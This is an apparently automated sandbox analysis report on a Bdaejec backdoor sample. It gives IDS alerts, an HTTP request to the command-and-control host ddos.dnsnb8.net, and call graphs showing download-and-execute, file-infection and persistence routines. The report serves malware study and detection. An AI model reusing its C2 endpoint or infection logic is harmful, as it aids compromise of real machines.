                        RT_MANIFEST0x97afa40x15aASCII text, with CRLF line terminatorsEnglishUnited States0.5491329479768786
                        DLLImport
                        IMM32.dllImmIsIME
                        WS2_32.dllgethostbyaddr
                        KERNEL32.dllGetVersionExA
                        USER32.dllCloseClipboard
                        GDI32.dllCreateFontIndirectA
                        ole32.dllCoInitialize
                        WINMM.dllwaveOutGetVolume
                        DDRAW.dllDirectDrawCreate
                        DSOUND.dll
                        COMDLG32.dllChooseColorA
                        SHELL32.dllSHGetPathFromIDListA
                        WTSAPI32.dllWTSSendMessageW
                        KERNEL32.dllGetCurrentProcess
                        USER32.dllCharUpperBuffW
                        ADVAPI32.dllRegQueryValueExA
                        KERNEL32.dllLocalAlloc, GetCurrentProcess, GetCurrentThread, LocalFree, GetModuleFileNameW, GetProcessAffinityMask, SetProcessAffinityMask, SetThreadAffinityMask, Sleep, ExitProcess, GetLastError, FreeLibrary, LoadLibraryA, GetModuleHandleA, GetProcAddress
                        ADVAPI32.dllOpenSCManagerW, EnumServicesStatusExW, OpenServiceW, QueryServiceConfigW, CloseServiceHandle
                        Language of compilation systemCountry where language is spokenMap
                        ChineseTaiwan
                        EnglishUnited States
                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                        2024-09-11T10:31:59.975702+02002838522ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup1192.168.2.6648891.1.1.153UDP
                        2024-09-11T10:32:00.466633+02002807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin1192.168.2.64971044.221.84.105799TCP
                        TimestampSource PortDest PortSource IPDest IP
                        Sep 11, 2024 10:32:00.078910112 CEST49710799192.168.2.644.221.84.105
                        Sep 11, 2024 10:32:00.083893061 CEST7994971044.221.84.105192.168.2.6
                        Sep 11, 2024 10:32:00.083987951 CEST49710799192.168.2.644.221.84.105
                        Sep 11, 2024 10:32:00.084156036 CEST49710799192.168.2.644.221.84.105
                        Sep 11, 2024 10:32:00.088951111 CEST7994971044.221.84.105192.168.2.6
                        Sep 11, 2024 10:32:00.466561079 CEST7994971044.221.84.105192.168.2.6
                        Sep 11, 2024 10:32:00.466592073 CEST7994971044.221.84.105192.168.2.6
                        Sep 11, 2024 10:32:00.466633081 CEST49710799192.168.2.644.221.84.105
                        Sep 11, 2024 10:32:00.466662884 CEST49710799192.168.2.644.221.84.105
                        Sep 11, 2024 10:32:00.468745947 CEST49710799192.168.2.644.221.84.105
                        Sep 11, 2024 10:32:00.474230051 CEST7994971044.221.84.105192.168.2.6
                        TimestampSource PortDest PortSource IPDest IP
                        Sep 11, 2024 10:31:59.975702047 CEST6488953192.168.2.61.1.1.1
                        Sep 11, 2024 10:32:00.072731972 CEST53648891.1.1.1192.168.2.6
                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                        Sep 11, 2024 10:31:59.975702047 CEST192.168.2.61.1.1.10x4b85Standard query (0)ddos.dnsnb8.netA (IP address)IN (0x0001)false
                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Sep 11, 2024 10:32:00.072731972 CEST1.1.1.1192.168.2.60x4b85No error (0)ddos.dnsnb8.net44.221.84.105A (IP address)IN (0x0001)false
                        • ddos.dnsnb8.net:799
                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.64971044.221.84.1057995008C:\Users\user\AppData\Local\Temp\mXfByV.exe
                        TimestampBytes transferredDirectionData
                        Sep 11, 2024 10:32:00.084156036 CEST288OUTGET /cj//k1.rar HTTP/1.1
                        Accept: */*
                        Accept-Encoding: gzip, deflate
                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                        Host: ddos.dnsnb8.net:799
                        Connection: Keep-Alive


                        Click to jump to process

                        Click to jump to process

                        Click to dive into process behavior distribution

                        Click to jump to process

                        Target ID:0
                        Start time:04:31:57
                        Start date:11/09/2024
                        Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe"
                        Imagebase:0x400000
                        File size:3'678'720 bytes
                        MD5 hash:6824B9059B9C6F285F3C6CAF2EE19ECC
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        Target ID:2
                        Start time:04:31:58
                        Start date:11/09/2024
                        Path:C:\Users\user\AppData\Local\Temp\mXfByV.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\AppData\Local\Temp\mXfByV.exe
                        Imagebase:0x640000
                        File size:15'872 bytes
                        MD5 hash:56B2C3810DBA2E939A8BB9FA36D3CF96
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Antivirus matches:
                        • Detection: 100%, Avira
                        • Detection: 100%, Joe Sandbox ML
                        • Detection: 100%, ReversingLabs
                        • Detection: 96%, Virustotal, Browse
                        Reputation:moderate
                        Has exited:true

                        Target ID:6
                        Start time:04:32:03
                        Start date:11/09/2024
                        Path:C:\Windows\SysWOW64\WerFault.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5008 -s 1532
                        Imagebase:0x30000
                        File size:483'680 bytes
                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Reset < >

                          Execution Graph

                          Execution Coverage:31.9%
                          Dynamic/Decrypted Code Coverage:10.4%
                          Signature Coverage:23.6%
                          Total number of Nodes:297
                          Total number of Limit Nodes:12
                          execution_graph 1349 646014 1350 646035 GetModuleHandleA 1349->1350 1351 64605f 1349->1351 1352 64604d GetProcAddress 1350->1352 1353 646058 1352->1353 1353->1351 1353->1352 1353->1353 1020 646076 1021 64607b 1020->1021 1025 6460c7 1020->1025 1023 6460b0 VirtualAlloc 1021->1023 1021->1025 1027 6461b2 1021->1027 1022 64615f VirtualFree 1022->1025 1023->1025 1024 646198 VirtualFree 1024->1027 1025->1022 1025->1024 1026 6460d5 VirtualAlloc 1025->1026 1026->1025 1028 646389 VirtualProtect 1027->1028 1033 6462fb 1027->1033 1032 6463b7 1028->1032 1029 6463fc VirtualProtect 1030 646400 1029->1030 1031 6463e7 VirtualProtect 1031->1029 1031->1032 1032->1029 1032->1031 1034 6414e1 1035 641541 1034->1035 1036 6414fd GetModuleHandleA 1034->1036 1039 641573 1035->1039 1040 641549 1035->1040 1037 641512 1036->1037 1038 64151a VirtualQuery 1036->1038 1037->1035 1038->1037 1045 641638 GetTempPathA GetSystemDirectoryA GetModuleFileNameA 1039->1045 1044 641566 1040->1044 1062 641af9 1040->1062 1042 641579 ExitProcess 1046 64167f 1045->1046 1047 64167a 1045->1047 1068 641718 GetSystemTimeAsFileTime 1046->1068 1080 64139f GetVersionExA 1047->1080 1050 641686 1051 6416ca 1050->1051 1054 6416a0 CreateThread 1050->1054 1052 6416d7 1051->1052 1053 6416d0 1051->1053 1056 6416dd lstrcpy 1052->1056 1057 64170f 1052->1057 1101 641581 1053->1101 1073 642c48 memset 1054->1073 1317 641099 1054->1317 1056->1042 1057->1042 1061 641718 3 API calls 1061->1051 1063 641b11 1062->1063 1064 641b09 1062->1064 1066 641b16 CreateThread 1063->1066 1067 641b0f 1063->1067 1065 641638 188 API calls 1064->1065 1065->1067 1066->1067 1336 641638 189 API calls 1066->1336 1067->1044 1069 641754 1068->1069 1070 641735 SHSetValueA 1068->1070 1071 64175a SHGetValueA 1069->1071 1072 641786 __aulldiv 1069->1072 1070->1072 1071->1072 1072->1050 1107 641973 PathFileExistsA 1073->1107 1076 642cb2 1078 6416ba WaitForSingleObject 1076->1078 1079 642cbb VirtualFree 1076->1079 1077 642c8f CreateThread WaitForMultipleObjects 1077->1076 1129 642b8c memset GetLogicalDriveStringsA 1077->1129 1078->1061 1079->1078 1081 6413cf LookupPrivilegeValueA 1080->1081 1082 6414da 1080->1082 1083 6413e7 1081->1083 1084 6413ef 1081->1084 1082->1046 1297 64119f GetCurrentProcess OpenProcessToken 1083->1297 1084->1082 1302 64120e GetModuleHandleA GetProcAddress 1084->1302 1090 641448 GetCurrentProcessId 1090->1082 1091 641457 1090->1091 1091->1082 1092 641319 3 API calls 1091->1092 1093 64147f 1092->1093 1094 641319 3 API calls 1093->1094 1095 64148e 1094->1095 1095->1082 1096 641319 3 API calls 1095->1096 1097 6414b4 1096->1097 1098 641319 3 API calls 1097->1098 1099 6414c3 1098->1099 1100 641319 3 API calls 1099->1100 1100->1082 1316 64185b GetSystemTimeAsFileTime srand rand srand rand 1101->1316 1103 641592 wsprintfA wsprintfA lstrlen CreateFileA 1104 641633 1103->1104 1105 6415fb WriteFile CloseHandle 1103->1105 1104->1057 1105->1104 1106 64161d ShellExecuteA 1105->1106 1106->1104 1108 641ac7 1107->1108 1109 6419a0 1107->1109 1108->1076 1108->1077 1110 6419af CreateFileA 1109->1110 1111 6419c4 Sleep 1110->1111 1112 641a28 GetFileSize 1110->1112 1111->1110 1113 6419d5 1111->1113 1114 641a80 1112->1114 1115 641a38 1112->1115 1128 64185b GetSystemTimeAsFileTime srand rand srand rand 1113->1128 1118 641a96 1114->1118 1119 641a8d CloseHandle 1114->1119 1115->1114 1117 641a3d VirtualAlloc 1115->1117 1117->1114 1127 641a53 1117->1127 1121 641aad 1118->1121 1126 641a9c DeleteFileA 1118->1126 1119->1118 1120 6419da wsprintfA CopyFileA 1120->1112 1123 641a0d CreateFileA 1120->1123 1121->1108 1125 641ab8 VirtualFree 1121->1125 1123->1112 1123->1126 1124 641a59 ReadFile 1124->1114 1124->1127 1125->1108 1126->1121 1127->1114 1127->1124 1128->1120 1130 642bc8 1129->1130 1131 642c09 WaitForMultipleObjects 1129->1131 1132 642bfa lstrlen 1130->1132 1135 642bd2 GetDriveTypeA 1130->1135 1136 642be3 CreateThread 1130->1136 1133 642c3c 1131->1133 1134 642c2a CreateThread 1131->1134 1132->1130 1132->1131 1134->1133 1140 642845 1134->1140 1135->1130 1135->1132 1136->1132 1137 642b7d 1136->1137 1150 6429e2 memset wsprintfA 1137->1150 1287 64274a memset memset SHGetSpecialFolderPathA wsprintfA 1140->1287 1142 642878 DeleteFileA 1143 64288c VirtualFree 1142->1143 1144 64289a 1142->1144 1143->1144 1145 6428a4 CloseHandle 1144->1145 1146 6428ab 1144->1146 1145->1146 1147 642692 8 API calls 1148 642853 1147->1148 1148->1142 1148->1147 1149 64239d 186 API calls 1148->1149 1149->1148 1151 642abc memset memset FindFirstFileA 1150->1151 1152 642a3a memset lstrlen lstrcpyn strrchr 1150->1152 1164 6428b8 memset wsprintfA 1151->1164 1152->1151 1153 642a88 1152->1153 1153->1151 1156 642a9a lstrcmpiA 1153->1156 1158 642b74 1156->1158 1159 642aad lstrlen 1156->1159 1157 642b61 FindNextFileA 1160 642b23 1157->1160 1161 642b6d FindClose 1157->1161 1159->1151 1159->1156 1162 642b35 lstrcmpiA 1160->1162 1163 6428b8 174 API calls 1160->1163 1161->1158 1162->1160 1162->1161 1163->1157 1165 642905 1164->1165 1170 642951 memset 1164->1170 1166 642956 strrchr 1165->1166 1167 64291b memset wsprintfA 1165->1167 1165->1170 1169 642967 lstrcmpiA 1166->1169 1166->1170 1168 6429e2 180 API calls 1167->1168 1168->1170 1171 642988 lstrcmpiA 1169->1171 1172 64297a 1169->1172 1170->1157 1171->1170 1173 642994 1171->1173 1182 641e6e 1172->1182 1175 6429ad strstr 1173->1175 1176 6429a5 lstrcpy 1173->1176 1177 6429d3 1175->1177 1178 6429cb 1175->1178 1176->1175 1247 642692 1177->1247 1225 64239d strstr 1178->1225 1183 641e7d 1182->1183 1256 641df6 strrchr 1183->1256 1186 641eb0 SetFileAttributesA CreateFileA 1187 642332 1186->1187 1188 641edf 1186->1188 1190 642346 1187->1190 1191 64233d UnmapViewOfFile 1187->1191 1261 641915 1188->1261 1193 642350 1190->1193 1194 64234b CloseHandle 1190->1194 1191->1190 1195 642356 CloseHandle 1193->1195 1196 642391 1193->1196 1194->1193 1195->1196 1196->1170 1197 641f2e 1197->1187 1267 641c81 1197->1267 1201 641f92 1202 641c81 2 API calls 1201->1202 1203 641f9f 1202->1203 1203->1187 1204 641af9 169 API calls 1203->1204 1205 642024 1203->1205 1209 641fc0 1204->1209 1205->1187 1206 641af9 169 API calls 1205->1206 1207 64207a 1206->1207 1208 641af9 169 API calls 1207->1208 1213 642090 1208->1213 1209->1187 1209->1205 1210 641af9 169 API calls 1209->1210 1211 641ffe 1210->1211 1212 642013 FlushViewOfFile 1211->1212 1212->1205 1214 6420bb memset memset 1213->1214 1215 6420f5 1214->1215 1216 641c81 2 API calls 1215->1216 1218 6421de 1216->1218 1217 642226 memcpy UnmapViewOfFile CloseHandle 1272 641b8a 1217->1272 1218->1217 1220 64226e 1280 64185b GetSystemTimeAsFileTime srand rand srand rand 1220->1280 1222 6422ab SetFilePointer SetEndOfFile SetFilePointer WriteFile WriteFile 1223 641915 3 API calls 1222->1223 1224 64231f CloseHandle 1223->1224 1224->1187 1226 642451 CreateFileA GetFileSize 1225->1226 1231 6423d8 1225->1231 1227 642675 CloseHandle 1226->1227 1228 642480 1226->1228 1229 64267c RemoveDirectoryA 1227->1229 1228->1227 1232 642499 1228->1232 1230 642687 1229->1230 1230->1170 1231->1226 1231->1230 1233 641915 3 API calls 1232->1233 1234 6424a4 9 API calls 1233->1234 1282 64189d memset CreateProcessA 1234->1282 1237 64255c Sleep memset wsprintfA 1238 6429e2 163 API calls 1237->1238 1239 642597 memset wsprintfA Sleep 1238->1239 1240 64189d 6 API calls 1239->1240 1241 6425e4 Sleep CreateFileA 1240->1241 1242 641915 3 API calls 1241->1242 1243 642610 CloseHandle 1242->1243 1243->1229 1244 64261e 1243->1244 1244->1229 1245 642641 SetFilePointer WriteFile 1244->1245 1245->1229 1246 642667 SetEndOfFile 1245->1246 1246->1229 1248 6426b2 WaitForSingleObject 1247->1248 1249 6426a2 CreateEventA 1247->1249 1250 6426c1 lstrlen ??2@YAPAXI 1248->1250 1253 642708 1248->1253 1249->1248 1251 642736 SetEvent 1250->1251 1252 6426da lstrcpy 1250->1252 1251->1170 1254 6426f1 1252->1254 1253->1251 1255 642718 lstrcpy ??3@YAXPAX 1253->1255 1254->1251 1255->1254 1257 641e62 1256->1257 1258 641e13 lstrcpy strrchr 1256->1258 1257->1186 1257->1187 1258->1257 1259 641e40 lstrcmpiA 1258->1259 1259->1257 1260 641e52 lstrlen 1259->1260 1260->1257 1260->1259 1262 641928 1261->1262 1265 641924 SetFilePointer CreateFileMappingA MapViewOfFile 1261->1265 1263 64192e memset GetFileTime 1262->1263 1264 64194f 1262->1264 1263->1265 1264->1265 1266 641954 SetFileTime 1264->1266 1265->1187 1265->1197 1266->1265 1268 641c9c 1267->1268 1270 641c94 1267->1270 1269 641cae memset memset 1268->1269 1268->1270 1269->1270 1270->1187 1271 64185b GetSystemTimeAsFileTime srand rand srand rand 1270->1271 1271->1201 1273 641b93 1272->1273 1281 64185b GetSystemTimeAsFileTime srand rand srand rand 1273->1281 1275 641bca srand 1276 641bd8 rand 1275->1276 1277 641c08 1276->1277 1277->1276 1278 641c29 memset memcpy lstrcat 1277->1278 1278->1220 1280->1222 1281->1275 1283 6418e0 CloseHandle WaitForSingleObject 1282->1283 1284 64190c 1282->1284 1285 641907 CloseHandle 1283->1285 1286 6418fb GetExitCodeProcess 1283->1286 1284->1229 1284->1237 1285->1284 1286->1285 1296 64185b GetSystemTimeAsFileTime srand rand srand rand 1287->1296 1289 6427b5 wsprintfA CopyFileA 1290 642840 1289->1290 1291 6427de wsprintfA 1289->1291 1290->1148 1292 641973 17 API calls 1291->1292 1293 64280f 1292->1293 1294 642820 CreateFileA 1293->1294 1295 642813 DeleteFileA 1293->1295 1294->1290 1295->1294 1296->1289 1298 6411c6 AdjustTokenPrivileges 1297->1298 1299 641200 CloseHandle 1297->1299 1300 6411f6 1298->1300 1301 6411f7 CloseHandle 1298->1301 1299->1084 1300->1301 1301->1299 1303 641310 1302->1303 1304 64123f GetCurrentProcessId OpenProcess 1302->1304 1303->1082 1311 641319 1303->1311 1304->1303 1308 641262 1304->1308 1305 6412b0 VirtualAlloc 1305->1308 1309 6412b8 1305->1309 1306 6412f1 CloseHandle 1306->1303 1307 641302 VirtualFree 1306->1307 1307->1303 1308->1305 1308->1306 1308->1309 1310 641296 VirtualFree 1308->1310 1309->1306 1310->1305 1312 64134a 1311->1312 1313 64132a GetModuleHandleA GetProcAddress 1311->1313 1314 641351 memset 1312->1314 1315 641363 1312->1315 1313->1312 1313->1315 1314->1315 1315->1082 1315->1090 1316->1103 1318 641196 1317->1318 1319 6410ba 1317->1319 1319->1318 1335 64185b GetSystemTimeAsFileTime srand rand srand rand 1319->1335 1321 641118 wsprintfA wsprintfA URLDownloadToFileA 1322 6410dc 1321->1322 1323 641168 lstrlen Sleep 1321->1323 1326 641000 CreateFileA 1322->1326 1323->1319 1327 641025 GetFileSize CreateFileMappingA MapViewOfFile 1326->1327 1328 641092 WinExec lstrlen 1326->1328 1329 641057 1327->1329 1330 64107b 1327->1330 1328->1318 1328->1319 1333 641074 UnmapViewOfFile 1329->1333 1334 641061 1329->1334 1331 641087 CloseHandle 1330->1331 1332 64108d CloseHandle 1330->1332 1331->1332 1332->1328 1333->1330 1334->1333 1335->1321 1354 642361 1355 642374 1354->1355 1356 64236b UnmapViewOfFile 1354->1356 1357 642382 1355->1357 1358 642379 CloseHandle 1355->1358 1356->1355 1359 642391 1357->1359 1360 642388 CloseHandle 1357->1360 1358->1357 1360->1359 1337 646159 VirtualFree 1342 6460c7 1337->1342 1338 646198 VirtualFree 1340 6461b2 1338->1340 1339 6460d5 VirtualAlloc 1339->1342 1341 646389 VirtualProtect 1340->1341 1348 6462fb 1340->1348 1347 6463b7 1341->1347 1342->1338 1342->1339 1344 64615f VirtualFree 1342->1344 1343 6463fc VirtualProtect 1345 646400 1343->1345 1344->1342 1346 6463e7 VirtualProtect 1346->1343 1346->1347 1347->1343 1347->1346

                          Callgraph

                          • Executed
                          • Not Executed
                          • Opacity -> Relevance
                          • Disassembly available
                          callgraph 0 Function_00642D60 1 Function_006414E1 14 Function_00641AF9 1->14 29 Function_00641638 1->29 2 Function_00642361 54 Function_00642D9B 2->54 3 Function_006429E2 28 Function_006428B8 3->28 4 Function_00646B63 23 Function_006467A4 4->23 25 Function_00646834 4->25 27 Function_006469B0 4->27 5 Function_00641E6E 5->0 6 Function_00641C68 5->6 8 Function_00641DF6 5->8 5->14 22 Function_0064185B 5->22 34 Function_00641C81 5->34 40 Function_00641D8A 5->40 41 Function_00641B8A 5->41 44 Function_00641915 5->44 5->54 7 Function_00646076 17 Function_006466C8 7->17 9 Function_00642CF0 10 Function_00646CF2 13 Function_00646CF8 10->13 11 Function_00641973 11->22 12 Function_00642B7D 12->3 14->29 15 Function_00642845 18 Function_0064274A 15->18 45 Function_00642692 15->45 47 Function_0064239D 15->47 16 Function_00642C48 16->11 37 Function_00642B8C 16->37 30 Function_00646A84 17->30 32 Function_00646D00 17->32 36 Function_00646B02 17->36 18->11 18->22 19 Function_006417D0 20 Function_0064235D 21 Function_00646159 21->17 24 Function_006465A6 26 Function_00646734 26->30 26->32 26->36 28->3 28->5 28->45 28->47 29->16 29->19 35 Function_00641581 29->35 50 Function_0064139F 29->50 51 Function_00641718 29->51 52 Function_00641099 29->52 30->10 39 Function_0064680F 30->39 31 Function_00641000 31->19 32->4 32->10 32->27 33 Function_00646001 42 Function_0064600A 33->42 35->22 36->4 37->12 37->15 38 Function_0064120E 41->22 43 Function_00646014 46 Function_00646012 47->3 47->44 48 Function_0064189D 47->48 49 Function_0064119F 50->38 50->49 53 Function_00641319 50->53 51->9 52->22 52->31

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 101 6429e2-642a34 memset wsprintfA 102 642abc-642b21 memset * 2 FindFirstFileA call 6428b8 memset 101->102 103 642a3a-642a86 memset lstrlen lstrcpyn strrchr 101->103 108 642b61-642b6b FindNextFileA 102->108 103->102 104 642a88-642a98 103->104 104->102 107 642a9a-642aa7 lstrcmpiA 104->107 109 642b74-642b7a 107->109 110 642aad-642aba lstrlen 107->110 111 642b23-642b2a 108->111 112 642b6d-642b6e FindClose 108->112 110->102 110->107 113 642b4c-642b5c call 6428b8 111->113 114 642b2c-642b33 111->114 112->109 113->108 114->113 115 642b35-642b4a lstrcmpiA 114->115 115->112 115->113
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2213479346.0000000000641000.00000020.00000001.01000000.00000005.sdmp, Offset: 00640000, based on PE: true
                          • Associated: 00000002.00000002.2213440195.0000000000640000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213495608.0000000000643000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213510615.0000000000644000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213552279.0000000000646000.00000040.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_640000_mXfByV.jbxd
                          Similarity
                          • API ID: memset$Find$Filelstrcmpilstrlen$CloseFirstNextlstrcpynstrrchrwsprintf
                          • String ID: %s*$C:\$Documents and Settings
                          • API String ID: 2826467728-110786608
                          • Opcode ID: 482ffc6e283e8496c7ab8115aea8d64019ea393e8b21d6600b66df4d7d9509f5
                          • Instruction ID: 046e80ae3316cf4a6c617d805bdb80bef430b45e225c688b944c1159a9bb25da
                          • Opcode Fuzzy Hash: 482ffc6e283e8496c7ab8115aea8d64019ea393e8b21d6600b66df4d7d9509f5
                          • Instruction Fuzzy Hash: FF41CAB240434AAFD720DFA0EC89DDB7BEEEF85715F540929F944C3211E634D64887A6

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 172 641099-6410b4 173 641199-64119c 172->173 174 6410ba-6410c7 172->174 175 6410c8-6410d4 174->175 176 641184-641190 175->176 177 6410da 175->177 176->175 179 641196-641198 176->179 178 641113-641162 call 64185b wsprintfA * 2 URLDownloadToFileA 177->178 182 6410dc-64110d call 641000 WinExec lstrlen 178->182 183 641168-641182 lstrlen Sleep 178->183 179->173 182->178 182->179 183->176 183->178
                          APIs
                            • Part of subcall function 0064185B: GetSystemTimeAsFileTime.KERNEL32(00641F92,00000000,?,00000000,?,?,?,00641F92,?,00000000,00000002), ref: 00641867
                            • Part of subcall function 0064185B: srand.MSVCRT ref: 00641878
                            • Part of subcall function 0064185B: rand.MSVCRT ref: 00641880
                            • Part of subcall function 0064185B: srand.MSVCRT ref: 00641890
                            • Part of subcall function 0064185B: rand.MSVCRT ref: 00641894
                          • WinExec.KERNEL32(?,00000005), ref: 006410F1
                          • lstrlen.KERNEL32(00644748), ref: 006410FA
                          • wsprintfA.USER32 ref: 0064112A
                          • wsprintfA.USER32 ref: 00641143
                          • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 0064115B
                          • lstrlen.KERNEL32(ddos.dnsnb8.net,00000000,?,?,00000000,00000000), ref: 00641169
                          • Sleep.KERNEL32 ref: 00641179
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2213479346.0000000000641000.00000020.00000001.01000000.00000005.sdmp, Offset: 00640000, based on PE: true
                          • Associated: 00000002.00000002.2213440195.0000000000640000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213495608.0000000000643000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213510615.0000000000644000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213552279.0000000000646000.00000040.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_640000_mXfByV.jbxd
                          Similarity
                          • API ID: FileTimelstrlenrandsrandwsprintf$DownloadExecSleepSystem
                          • String ID: %s%.8X.exe$C:\Users\user\AppData\Local\Temp\$HGd$cj/$ddos.dnsnb8.net$http://%s:%d/%s/%s
                          • API String ID: 1280626985-3007441393
                          • Opcode ID: db53312962fcb2e492e5902d13b6328a411305bbc03ab13f6c4a250653052106
                          • Instruction ID: 88f58faf0b94b2451793cabb9c6a46e673ed7557c4739306be809d169ee69647
                          • Opcode Fuzzy Hash: db53312962fcb2e492e5902d13b6328a411305bbc03ab13f6c4a250653052106
                          • Instruction Fuzzy Hash: 1921AC79800218BEDB20DBA0DC4ABEEBBBFAB17745F110199E100A7250DB749B84CF60

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 216 641718-641733 GetSystemTimeAsFileTime 217 641754-641758 216->217 218 641735-641752 SHSetValueA 216->218 219 6417c6-6417cd 217->219 220 64175a-641784 SHGetValueA 217->220 218->219 220->219 221 641786-6417b3 call 642cf0 * 2 220->221 221->219 226 6417b5 221->226 227 6417b7-6417bd 226->227 228 6417bf 226->228 227->219 227->228 228->219
                          APIs
                          • GetSystemTimeAsFileTime.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\mXfByV.exe), ref: 00641729
                          • SHSetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,00000003,?,00000008), ref: 0064174C
                          • SHGetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,?,?,00000001), ref: 0064177C
                          • __aulldiv.LIBCMT ref: 00641796
                          • __aulldiv.LIBCMT ref: 006417A8
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2213479346.0000000000641000.00000020.00000001.01000000.00000005.sdmp, Offset: 00640000, based on PE: true
                          • Associated: 00000002.00000002.2213440195.0000000000640000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213495608.0000000000643000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213510615.0000000000644000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000002.00000002.2213552279.0000000000646000.00000040.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_640000_mXfByV.jbxd
                          Similarity
                          • API ID: TimeValue__aulldiv$FileSystem
                          • String ID: C:\Users\user\AppData\Local\Temp\mXfByV.exe$SOFTWARE\GTplus$Time
                          • API String ID: 541852442-4265843220
                          • Opcode ID: 5b34f81f490935e585d155d3744a6947243218e7e0e5b5bee35943abe5d08194
                          • Instruction ID: 4be2510dfdb582bf20ab0f9dc5cfdabd2d4cff908f7ae8f389f0dcc7e1d8e555
                          • Opcode Fuzzy Hash: 5b34f81f490935e585d155d3744a6947243218e7e0e5b5bee35943abe5d08194
                          • Instruction Fuzzy Hash: 55115B75A00219BBDB109B94CCC9FEF7BBFEB46B14F108115FA01B6281D671DA44C760

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 229 646076-646079 230 6460e0-6460eb 229->230 231 64607b-646080 229->231 232 6460ee-6460f4 230->232 233 6460f7-6460f8 231->233 234 646082-646085 231->234 235 6460f6 232->235 236 6460fe-646106 233->236 237 6460fa-6460fc call 6466c8 233->237 234->235 238 646087 234->238 235->233 240 646155-646189 VirtualFree 236->240 241 646108-64611d 236->241 237->236 238->232 242 646089-646095 238->242 247 64618c-646192 240->247 244 64611f-646121 241->244 245 646097-64609f 242->245 246 6460a1-6460aa 242->246 248 646151-646154 244->248 249 646123 244->249 245->246 250 6460b0-6460c1 VirtualAlloc 246->250 251 6461ba-6461c8 246->251 252 6460c7-6460cf 247->252 253 646198-6461b0 VirtualFree 247->253 248->240 249->248 256 646125-646128 249->256 250->252 254 646243-646251 251->254 255 6461ca-6461d7 251->255 252->247 263 6460d5-6460df VirtualAlloc 252->263 253->251 259 6461b2-6461b4 253->259 257 646264-64626f 254->257 258 646253 254->258 260 6461dd-6461e0 255->260 261 646134-64613b 256->261 262 64612a-64612e 256->262 265 646271-646276 257->265 264 646255-646258 258->264 259->251 260->254 266 6461e2-6461f2 260->266 273 646130-646132 261->273 274 64613d-64614f 261->274 262->261 262->273 263->230 264->257 269 64625a-646262 264->269 270 64627c-646289 265->270 271 646389-6463b1 VirtualProtect 265->271 272 6461f5-6461fe 266->272 269->264 287 646292-646298 270->287 288 64628b 270->288 277 6463b7-6463ba 271->277 275 646200-646203 272->275 276 64620c-646219 272->276 273->244 274->244 281 646205-646208 275->281 282 64621b-646228 275->282 283 646238-64623f 276->283 278 6463fc-6463ff VirtualProtect 277->278 279 6463bc-6463c2 277->279 286 646400-646416 278->286 279->279 284 6463c4 279->284 289 64622a-646236 281->289 290 64620a 281->290 282->283 283->272 285 646241 283->285 284->278 291 6463c6-6463cf 284->291 285->260 292 646420-646425 286->292 293 646418-64641d 286->293 294 6462a2-6462ac 287->294 288->287 289->283 290->283 297 6463d4-6463d8 291->297 298 6463d1 291->298 295 6462b1-6462c8 294->295 296 6462ae 294->296 299 646373-646384 295->299 300 6462ce-6462d4 295->300 296->295 301 6463dd-6463e1 297->301 302 6463da 297->302 298->297 299->265 303 6462d6-6462d9 300->303 304 6462da-6462f1 300->304 305 6463e7-6463fa VirtualProtect 301->305 306 6463e3 301->306 302->301 303->304 308 646365-64636e 304->308 309 6462f3-6462f9 304->309 305->277 305->278 306->305 308->294 310 646314-646326 309->310 311 6462fb-64630f 309->311 313 64634c-646360 310->313 314 646328-64634a 310->314 312 646426-6464a9 311->312 323 646519-64651c 